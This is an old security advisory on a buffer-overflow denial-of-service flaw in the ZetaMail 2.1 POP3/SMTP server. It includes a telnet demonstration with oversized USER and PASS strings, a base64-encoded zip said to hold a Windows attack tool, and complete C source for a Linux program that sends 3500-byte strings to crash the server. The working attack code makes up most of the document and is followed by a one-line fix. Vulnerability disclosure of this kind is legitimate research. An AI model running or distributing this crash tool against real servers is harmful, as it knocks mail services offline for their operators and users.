COMMAND
ZetaMail Mail POP3/SMTP Server
SYSTEMS AFFECTED
ZetaMail 2.1 Mail POP3/SMTP Server
PROBLEM
UssrLabs found a Local/Remote DoS Attack in ZetaMail 2.1 Mail
POP3/SMTP Server, the buffer overflow is caused by a long user
name/password, 3500 characters. There is not much to expand
on.... just a simple hole. Example:
[gimmemore@itsme]$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK ZetaMail for 95 BD0211 <4294764405.063903189415041@itsme>
USER {buffer)
+OK Send password
PASS {buffer)
Overflow Crash. Where (buffer) is 3500 characters. Binary /
Source for the D.o.s for Windows / Linux:
http://www.ussrback.com/zmail/
Below is mimed Win versions and Linux source. Win version:
---
Content-Type: application/octet-stream; name="zmaildos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="zmaildos.zip"
Content-MD5: dbGxWW5KxoFHiZnX9gYSvQ==
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
-----
Linux code:
/*
* Copyright (c) 1999 Ussr S.A.
* All rights reserved
* http://www.ussrback.com
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
char dos_code[3500];
char buffy[256];
char *host;
int ip, port, sockfd;
struct sockaddr_in servaddr;
struct hostent *phost;
int
main(int argc, char **argv)
{
if(argc < 2){
printf("Example DOS code for Zmail by Ussr labs.\n\n");
printf("Usage: %s hostname port (default 110)\n", argv[0]);
return(0);
}
if(argc == 2){
port = 110;
}
else {
sscanf(argv[2], "%hd", (char *)&port);
}
printf("Example DOS code for Zmail by Ussr labs.\n\n");
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error in socket funtion\n\n");
return(0);
}
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(port);
host = argv[1];
if(phost = gethostbyname(host)) {
bcopy(phost->h_addr, (char *)&ip, sizeof(u_long));
}
else if((ip = inet_addr(host)) == -1)
{
printf("ERROR! Cant resolve: %s \n\n", argv[1]);
return(0);
}
servaddr.sin_addr.s_addr = ip;
if (connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) < 0)
{
printf("ERROR! Cant connect to: %s port %d\n\n", argv[1], port);
return(0);
}
memset(buffy, 0, sizeof(buffy));
recv(sockfd, &buffy, sizeof(buffy), 0);
printf("%s",buffy);
memset(dos_code, 0x61, sizeof(dos_code));
dos_code[3498] = '\r';
dos_code[3499] = '\n';
memcpy(&dos_code[0], "user ", strlen("user "));
send(sockfd, dos_code, sizeof(dos_code), 0);
memset(buffy, 0, sizeof(buffy));
recv(sockfd, &buffy, sizeof(buffy), 0);
printf("%s",buffy);
memcpy(&dos_code[0], "pass ", strlen("pass "));
send(sockfd, dos_code, sizeof(dos_code), 0);
printf("DOS code are send OK!..\n");
close(sockfd);
return(0);
}
SOLUTION
Install another program from the same vendor MsgCore/95 2.11,
MsgCore/NT 2.10.